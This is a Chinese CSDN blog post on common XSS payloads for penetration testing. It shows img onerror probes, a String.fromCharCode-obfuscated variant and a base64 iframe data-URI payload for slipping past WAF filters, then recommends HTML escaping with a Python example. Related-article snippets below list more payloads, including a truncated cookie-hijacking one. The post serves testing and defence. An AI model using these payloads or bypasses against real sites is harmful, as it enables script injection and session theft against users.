xss常用Payload总结

最新推荐文章于 2024-06-19 01:27:23 发布
最新推荐文章于 2024-06-19 01:27:23 发布
阅读量1.1w 收藏 22
点赞数 3
分类专栏: 信息安全 文章标签: xss web安全 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/csd_ct/article/details/122287006
版权
本文介绍了常见的XSS攻击payload,包括img注入和iframe注入,展示了如何通过base64编码绕过WAF。同时,提出了防御XSS的有效方法——HTML编码转义,并给出了Python实现示例。了解这些技巧有助于提升Web应用的安全性。
摘要由CSDN通过智能技术生成

xss常用Payload总结

渗透测试时,常遇到页面输入框、留言板等输入交互点,大多是xss漏洞易出现的常见场景之一,记录几种常用的xss注入的姿势

1.img 注入

快速探测是否存在xss

1) <img src='x' onerror='alert(1)'>
2) <img src='x' onerror="eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))">

2.iframe 注入

后台做了相关过滤,如过滤了script、onerror等关键字,可对payload做base64编码

1) 先对payload进行base64编码,如:echo "<script>alert(22)</script>" | base64
2) 将编码得到的payload放入到 <iframe src="data:text/html;base64,payload></iframe>
3) <iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxMjM0KTs8L3NjcmlwdD4NCg=="></iframe>

高级绕waf姿势可参考这篇文章:xss绕waf姿势剖析

防御总结

除了对用户输入的字符做filter,过滤script、onxx等危险字符串,防御xss最有效的方式是对"<"、">"字符进行html编码转义
如输入payload:<script>alert(1)</script>
在python中,对其进行html编码转义:

import html
userInput = "<script>alert(1)</script>"
outPut = html.escape(userInput)
print(outPut)

hmtl编码转义如图,
html编码转义

csd_ct
关注
  • 3
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
payload的使 常用xss_XSS Payload深入分析整理
weixin_39567870的博客
12-20 572
几种加载XSS Payload的不常见标签众所周知,一种调用JavaScript的方法就是在元素类型上使用事件处理器(Event Handler),通常的一种方法类似:这是一种使用无效src属性来触发 onerror 事件处理器(onerror event handler)的方法,当然,其中包含了一个alert跳出框的xss payload,如下alert(1):由于过度使用img标签和onerr...
payload的使 常用xss_小课堂 -- XSS常见payload
weixin_39617497的博客
12-20 728
环境:http://xss-quiz.int21h.jp一、Stage #1 无过滤xss漏洞1、随便输入字符:123 2、输入payload: 3、弹出对话框,说明存在xss漏洞 二、Stage #2 属性中的xss漏洞1、在窗口中输入payload:,查看审查元素,payload被写在一个标签中 2、重新构造payload,先闭合标签:"> 或者 "onmouseover=alert(d...
XSS payload大全
01-22
总结XSSpayload,可以直接使用,直接进行攻击,各种payload
XSS Payloads: 网络安全中的黑客艺术与防御工具
gitblog_00067的博客
04-10 413
XSS Payloads: 网络安全中的黑客艺术与防御工具 XSS-PayloadsThis repository holds all the list of advanced XSS payloads that can be used in penetration testing. These payloads can be loaded into XSS scanners as well.项...
Web安全基础学习:XSS跨站脚本漏洞之存储型XSS
最新发布
qq_51862722的博客
06-19 1086
存储型XSS漏洞:指像留言板、用户名称、日志信息等一些会存储在服务器端的信息,当攻击者在存在存储型XSS漏洞的功能点进行注入之后,任何浏览器端加载该信息的时候都会将其中的恶意代码解析,进而触发XSS攻击。该方法甚至可以在管理员审核留言或查看系统信息时触发,进而造成管理员敏感信息的泄露。因为其存储在服务器端,因此造成的危险程度、攻击范围比反射型更大更广。留言板、评论区、用户头像、个性签名、登录日志、博客等。
xss绕过,payload全集
热门推荐
spang_33的博客
07-05 2万+
XSS总结:        xss分为三种,反射型xss,DOM型XSS及存储型XSS,不同类型的XSS的危害不同,有兴趣的可以观看一下csdn上明智讲的关于XSS攻击及原理。https://edu.csdn.net/course/detail/8585里面的修复原理和补丁代码讲的还是很详细的,他的课程还有利用xss获取cookie等。&lt;img src=x onerror=alert(1)&...
XSS常用Payload
z2560088的博客
01-11 9825
1.普通的 <ScRipt>alert(1)</ScRipt> 1"><ScRipt>alert(1)</ScRipt>2.绕过htmlspecialchars方法,先闭合输入,再使用事件来绕过 ' onclick ='javascript:alert(1)'// " onclick ='javascript:alert(1)'// 3.<> script onclick被过滤,用a标签绕过 "></input><
XSS payload 大全
08-01 2197
收集的一些XSS payload,主要分为五大类,便于查阅。 #第一类:Javascript URL &lt;a href="javascript:alert('test')"&gt;link&lt;/a&gt; &lt;a href="java&amp;#115;cript:alert('xss')"&gt;link&lt;/a&gt; &lt;a href='vbscript:Ms
28、XSS常见payload
weixin_41489908的博客
01-02 5586
环境:http://xss-quiz.int21h.jp 一、Stage #1 无过滤xss漏洞 1、随便输入字符:123 2、输入payload: 3、弹出对话框,说明存在xss漏洞 二、Stage #2 属性中的xss漏洞 1、在窗口中输入payload:,查看审查元素,payload被写在一个标签中 2、重新构造payload,先闭合标签: "> 或者 "οnmοuseοve...
XSSpayload 常用构造和变形方法
吉吉的博客
03-06 2366
XSS 相关 payload 构造和变形的常用方法。
xss payload
weixin_33701564的博客
06-29 351
><SCRIPT>alert("hello")</SCRIPT> 转载于:https://www.cnblogs.com/fanzi2009/archive/2009/08/13/1545474.html
XSS测试payload
09-19
XSS测试payload,收集了简单的XSS测试用例,较具有实用性。
xss payload下载
04-03
多达5500多条xss payload提供下载,方便渗透测试人员更好地fuzz目标站点,检测xss漏洞是否存在
xss常见payload脚本
09-01
xsspayload包括各种标签的payload,类似于字典。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。
xss常用payload
11-25
以下是几种常用XSS Payload: 1. 弹窗XSS Payload: ```html <script>alert('XSS') ``` 2. Cookie劫持XSS Payload: ```html <script>document.location='...
xss payload构造方法
weixin_48734687的博客
10-01 2387
对照教程闯了几关总结一下各种绕过方式 url传参注入 未对参数进行任何过滤的 payload: <script>alert()</script> <img src=1 onerror=alert()> payload被引号包裹的 例如:<input name=keyword value="<script>alert()</script>">
88.网络安全渗透测试—[常规漏洞挖掘与利用篇4]—[xss漏洞测试-加载payload的方法]
qwsn
01-25 4101
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、xss漏洞测试-加载payload的方法 1、背景 2、xss平台通用payload加载 3、img 创建script标签加载 4、字符并接加载 5、jquery加载
XSS 漏洞总结
4ct10n
11-03 1万+
xss一直以来接触最少的类型,现在终于有幸将其总结一下了·····,xss漏洞是目前最为常见的漏洞类型之一,其触发脚本经常与js代码有关,所以要想掌握好xss必须要有深厚的js编码功底。本篇内容是我学习xss总结,会结合着代码编写与实验,对xss进行系统的讲解,以便我更好的认识xss
XSS payload (大集合)
m0_51186260的博客
10-18 3111
<script>alert(/xss/)</script> <script>alert(&#38;XSS&#38;)</script> <script>alert(&quot;XSS&quot;)</script>(代替被转义的“”) <INPUT type="text"value='\'><SCRIPT>alert(String.fromCharCode(88,83,83))&l
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值